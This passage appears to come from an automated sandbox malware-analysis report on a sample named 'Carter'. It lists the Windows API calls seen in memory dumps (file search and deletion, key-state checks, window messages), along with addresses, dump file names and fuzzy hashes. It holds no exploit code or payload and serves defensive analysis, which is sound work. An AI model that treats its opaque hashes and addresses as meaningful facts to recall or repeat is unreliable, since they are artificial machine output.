                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: e980f44e4e53e9e82ae2c9207e00800cacb6d587167f88a3cdce94694afc0fce
                                                                        • Instruction ID: 3788e01cbb088adaf37e4ec6c562b31e76f25f2af32de4ed65c69efc3b9d0f7b
                                                                        • Opcode Fuzzy Hash: e980f44e4e53e9e82ae2c9207e00800cacb6d587167f88a3cdce94694afc0fce
                                                                        • Instruction Fuzzy Hash: 501128316007059FD320CF55D480B63B7E5FF88720F10892DEAAA86A60D7B1F945AB60
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                                        • Instruction ID: 3de6a50be525063a7d75499be40fcb0fa2afb67259af6ca2a94d250b7d23a4ff
                                                                        • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                                        • Instruction Fuzzy Hash: 27012672600706AED3215F38C801BB7BB98EF447A0F10852EF65ACA1E0EA31E4409790
                                                                        APIs
                                                                        • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 01054998
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentVariable
                                                                        • String ID:
                                                                        • API String ID: 1431749950-0
                                                                        • Opcode ID: 0db2d7af0eae34b6e269990c3f7066fca9ae81856939effc821e3d2717366284
                                                                        • Instruction ID: 018fd488b6c0a5eba42656fa9e91f98d8b1b3d7be28b5ef50493fe4d5342839f
                                                                        • Opcode Fuzzy Hash: 0db2d7af0eae34b6e269990c3f7066fca9ae81856939effc821e3d2717366284
                                                                        • Instruction Fuzzy Hash: F1F08135608209AFDB11EB65D845CAF77BCEF55320B000059F848DB2A0EE70F941DB50
                                                                        APIs
                                                                          • Part of subcall function 01000FE6: std::exception::exception.LIBCMT ref: 0100101C
                                                                          • Part of subcall function 01000FE6: __CxxThrowException@8.LIBCMT ref: 01001031
                                                                        • _memset.LIBCMT ref: 01047CB4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 525207782-0
                                                                        • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                                        • Instruction ID: 0f3015e0a8d7f791d6d030b12b07c3cbcac7c3c651d3b64e194348a31f6f7b1d
                                                                        • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                                        • Instruction Fuzzy Hash: D501F6742042059FE322EF5CD941F59BBE1AF69350F2484AEF5C88B3A1DB72E840DB95
                                                                        APIs
                                                                          • Part of subcall function 01000FE6: std::exception::exception.LIBCMT ref: 0100101C
                                                                          • Part of subcall function 01000FE6: __CxxThrowException@8.LIBCMT ref: 01001031
                                                                        • _memmove.LIBCMT ref: 0101DC8B
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throw_memmovestd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1602317333-0
                                                                        • Opcode ID: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
                                                                        • Instruction ID: 253adef2935cebc81f1077d70d313e105d8ac9e59226d13bb1676593bf207e46
                                                                        • Opcode Fuzzy Hash: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
                                                                        • Instruction Fuzzy Hash: 1DF0F974604142DFE715DF68C980F25BBE1BF2A344F24849CE1C98B3A1E772E811DB91
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _fseek
                                                                        • String ID:
                                                                        • API String ID: 2937370855-0
                                                                        • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                        • Instruction ID: fcb7c0ff8ced4ceed7620f096f0d10ec4360722ef451983c34f327bc1ae77bb5
                                                                        • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                        • Instruction Fuzzy Hash: 84F085B6500208FFDF118F84DC00DEBBBBDEF89320F044498F9045A220D232EA219BB0
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,?,?,00FF27AF,?,00000001), ref: 00FF4A63
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 84d2665bdfdd4eea5296a3a5ca1fc32705e72d175596068bec8d0b77246d3d92
                                                                        • Instruction ID: 6d451bb93a23ba0b4e059ec0bf55151f1ee0d4abc068663e7723cf5a28a6655f
                                                                        • Opcode Fuzzy Hash: 84d2665bdfdd4eea5296a3a5ca1fc32705e72d175596068bec8d0b77246d3d92
                                                                        • Instruction Fuzzy Hash: 06F01C71545705CFCB349F64E490827BBF0AF14325320892EE2D683630C736A944EF44
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock
                                                                        • String ID:
                                                                        • API String ID: 2638373210-0
                                                                        • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                        • Instruction ID: 6922973fda71ba47983d73132139204ec69e280a04e30b70880baf16e10a3c1e
                                                                        • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                        • Instruction Fuzzy Hash: A3F0587240020DFFDF05CF80C941EAABB79FF04314F208189FD188A251D336EA21AB90
                                                                        APIs
                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 010009E4
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LongNamePath_memmove
                                                                        • String ID:
                                                                        • API String ID: 2514874351-0
                                                                        • Opcode ID: be6d111988d99ea6fc3a2b6d830bfd501136529fa65b95648960da791c59983e
                                                                        • Instruction ID: 7911f9862b796748c90ac5fb3bb4677ea27eda444aa3186904038d3904f4caa6
                                                                        • Opcode Fuzzy Hash: be6d111988d99ea6fc3a2b6d830bfd501136529fa65b95648960da791c59983e
                                                                        • Instruction Fuzzy Hash: D0E0863690012857C72195A89C05FEA77DDEF89690F0442B6FD4CD7248D9659C818691
                                                                        APIs
                                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 01044D31
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FolderPath_memmove
                                                                        • String ID:
                                                                        • API String ID: 3334745507-0
                                                                        • Opcode ID: a507561d1476625aa0baa141efe36f52bdeab67a17a52124b0a9eaced6121088
                                                                        • Instruction ID: 3eaabff365f20dbc41c92247fd5bc21735bd7b816c8182601dcf6af831370a9e
                                                                        • Opcode Fuzzy Hash: a507561d1476625aa0baa141efe36f52bdeab67a17a52124b0a9eaced6121088
                                                                        • Instruction Fuzzy Hash: 5DD05EB190032C6BDB60E6A49C0DDB77BACEB44220F0007A17C9CD3105ED689D4586E0
                                                                        APIs
                                                                          • Part of subcall function 0104384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,01043959,00000000,00000000,?,010305DB,01098070,00000002,?,?), ref: 010438CA
                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,010305DB,01098070,00000002,?,?,?,00000000), ref: 01043967
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: File$PointerWrite
                                                                        • String ID:
                                                                        • API String ID: 539440098-0
                                                                        • Opcode ID: e4ca15379b35fea41f5781f0ff1df65ae879152077ed3cbc9dfa9080904e9fa7
                                                                        • Instruction ID: fa0e4a173aaee6e9942aca1f87ca61820bce0f40c5b379e6bd487cb90490b92c
                                                                        • Opcode Fuzzy Hash: e4ca15379b35fea41f5781f0ff1df65ae879152077ed3cbc9dfa9080904e9fa7
                                                                        • Instruction Fuzzy Hash: F1E04F35400218BBD720AF94D800ADAB7BCEB15310F00465AFD4095101D7B29E149BD0
                                                                        APIs
                                                                        • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,01043E7D,?,?,?), ref: 01043F0D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CopyFile
                                                                        • String ID:
                                                                        • API String ID: 1304948518-0
                                                                        • Opcode ID: 720bc404e52fd5960cea2ae634f85748eb9059edd0fdb4b729176d0612b6fbb8
                                                                        • Instruction ID: 1400722f1593c5c222923546742659fd7f88ff522699558cde2ad901fc23c9aa
                                                                        • Opcode Fuzzy Hash: 720bc404e52fd5960cea2ae634f85748eb9059edd0fdb4b729176d0612b6fbb8
                                                                        • Instruction Fuzzy Hash: 9DD0A7315E020CBBEF60DFA0CC02F68B7ACE702706F1002A4B504E90D0DA7669149795
                                                                        APIs
                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,010306E6,00000000,00000000,00000000), ref: 00FF42BF
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: ae766de861fc2b0ab2aa550fa48e247893aee7f9dc6a501bf5a0eda31a6c2e96
                                                                        • Instruction ID: 61d095c8d32a538667f2b7088371bcbb761ad6cb4ef00cf0e985a692ff34dc5a
                                                                        • Opcode Fuzzy Hash: ae766de861fc2b0ab2aa550fa48e247893aee7f9dc6a501bf5a0eda31a6c2e96
                                                                        • Instruction Fuzzy Hash: 48D0C77464020CBFE710CB80DC46FA9777CE705710F100294FD04A6294D6B27D508795
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(?,01043BFE), ref: 01044FED
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 02fbffe2a310cc3d1f6eb973ea3f49918062c6d91091901eb767e2c51c23f1d3
                                                                        • Instruction ID: 8c44f519a8a0c929585b59646f3c4436931cc1d34304271d2730e0cac9519459
                                                                        • Opcode Fuzzy Hash: 02fbffe2a310cc3d1f6eb973ea3f49918062c6d91091901eb767e2c51c23f1d3
                                                                        • Instruction Fuzzy Hash: 6EB092B400160157EDB81E3C258C2993B8158432A97D81BD2E5F8E58E5923A944FA620
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __wfsopen
                                                                        • String ID:
                                                                        • API String ID: 197181222-0
                                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                        • Instruction ID: 1d17dbc9a8421a492554b114ca5ed62d7aec23d94b85b6b9920fc12b28ec0aa4
                                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                        • Instruction Fuzzy Hash: 47B0927654020C77DE022A82EC02A9A3B299B50668F408020FB0C1C1A1EA73A6609A89
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000002,00000000), ref: 0104D842
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1452528299-0
                                                                        • Opcode ID: 04314cd101c8a97d30a71fc7d171928a514f8f3c6a316701080916605d6c2cbe
                                                                        • Instruction ID: 081bd9580c6e9782dcf059204d5f5d6ea2393b98e6bf9cc0841c750afa1a74e1
                                                                        • Opcode Fuzzy Hash: 04314cd101c8a97d30a71fc7d171928a514f8f3c6a316701080916605d6c2cbe
                                                                        • Instruction Fuzzy Hash: 467181702043068FD714EFA8C8D1AAEB7E1BF98354F04466DF5DA972A2DB34E905CB52
                                                                        APIs
                                                                          • Part of subcall function 01044005: FindFirstFileW.KERNEL32(?,?), ref: 0104407C
                                                                          • Part of subcall function 01044005: DeleteFileW.KERNEL32(?,?,?,?), ref: 010440CC
                                                                          • Part of subcall function 01044005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 010440DD
                                                                          • Part of subcall function 01044005: FindClose.KERNEL32(00000000), ref: 010440F4
                                                                        • GetLastError.KERNEL32 ref: 0104C292
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                        • String ID:
                                                                        • API String ID: 2191629493-0
                                                                        • Opcode ID: 3e4a53726a6e7122b7fd2eff8404ab9924a9098966bb3e918c1084d43c623e88
                                                                        • Instruction ID: 2fd3b9acbaea3457c7afb2fdfb1f070464dc3031041852314d94bbc85143f31e
                                                                        • Opcode Fuzzy Hash: 3e4a53726a6e7122b7fd2eff8404ab9924a9098966bb3e918c1084d43c623e88
                                                                        • Instruction Fuzzy Hash: 69F08C322102148FDB20EF59D880B6AB7E9AF89320F058059F9499B352CB78BC02DB94
                                                                        APIs
                                                                        • CloseHandle.KERNEL32(?,?,00000000,01022F8B), ref: 00FF42EF
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandle
                                                                        • String ID:
                                                                        • API String ID: 2962429428-0
                                                                        • Opcode ID: 9c50fc91e78193299c073192aa08ab24aa77e056761cd21caa9d8207375b671a
                                                                        • Instruction ID: e9570495d3eb74dec6aa3cc77fe5ff3273befd2c0517c31856d3fa43a03c11d2
                                                                        • Opcode Fuzzy Hash: 9c50fc91e78193299c073192aa08ab24aa77e056761cd21caa9d8207375b671a
                                                                        • Instruction Fuzzy Hash: D6E09275800B01CFC3314F1AE804422FBF8FFE13713214A2EE1E692664E3B0689A9B60
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0106D208
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0106D249
                                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0106D28E
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0106D2B8
                                                                        • SendMessageW.USER32 ref: 0106D2E1
                                                                        • _wcsncpy.LIBCMT ref: 0106D359
                                                                        • GetKeyState.USER32(00000011), ref: 0106D37A
                                                                        • GetKeyState.USER32(00000009), ref: 0106D387
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0106D39D
                                                                        • GetKeyState.USER32(00000010), ref: 0106D3A7
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0106D3D0
                                                                        • SendMessageW.USER32 ref: 0106D3F7
                                                                        • SendMessageW.USER32(?,00001030,?,0106B9BA), ref: 0106D4FD
                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0106D513
                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0106D526
                                                                        • SetCapture.USER32(?), ref: 0106D52F
                                                                        • ClientToScreen.USER32(?,?), ref: 0106D594
                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0106D5A1
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0106D5BB
                                                                        • ReleaseCapture.USER32 ref: 0106D5C6
                                                                        • GetCursorPos.USER32(?), ref: 0106D600
